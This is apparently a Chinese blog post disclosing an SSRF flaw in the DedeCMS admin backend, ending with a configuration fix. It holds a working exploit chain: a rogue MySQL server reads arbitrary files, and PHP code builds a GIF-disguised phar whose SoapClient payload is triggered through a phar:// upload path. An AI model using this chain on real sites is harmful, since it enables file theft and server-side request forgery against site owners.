dedecms织梦后台存在SSRF漏洞

2025-08-04 0 9
dedecms的后台存在ucenter功能,可以直接修改ucenter的配置,使网站的mysql连接。指向我们预先构造的rogue mysql server https://github.com/Gifts/Rogue-MySql-Server.git
设置之后我们就可以通过修改恶意服务端的设置来读取任意文件。 假如读取的文件路径是以phar协议开头的,那么读取的文件内容就会被反序列化。 根据dedecms的代码,我们可以利用soapclient内置类来构造反序列化pop链来ssrf。
<?php
class Control
{
    var $tpl;
    public $dsql;
    function __construct(){
                $this->dsql = new SoapClient(null,array(‘uri’=>’http://test:5555’, ‘location’=>’http://test:5555/aaa’));
        }
}
@unlink(“dedecms.phar”);
$phar = new Phar(“dedecms.phar”);
$phar->startBuffering();
$phar->setStub(“GIF89a”.”<?php __HALT_COMPILER(); ?>”);
$o = new Control();
$phar->setMetadata($o);
$phar->addFromString(“test.txt”, “test”);
$phar->stopBuffering();
?>
将生成的文件修改为dedecms.png,然后在dedecms上有很多地方都可以上传。
上传成功之后可以从文件列表中获取到图片链接。
phar://../uploads/allimg/190724/1_1529564891.png/test.txt
设置完成之后,刷新就可以触发ssrf。
  • 解决方案:
临时解决方案
通过mysqli_options设置链接时禁用allow_local_infile配置可阻止该漏洞。
或在php.ini中改配置为mysqli.allow_local_infile = Off
收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

版权声明:所有的源码、软件和资料,不得使用于非法商业用途,不得违反国家法律,一切关于该资源商业行为与本站无关。

免费cms模板 dedecms教程 dedecms织梦后台存在SSRF漏洞 https://www.mianfeicms.com/937.html

相关文章

发表评论
暂无评论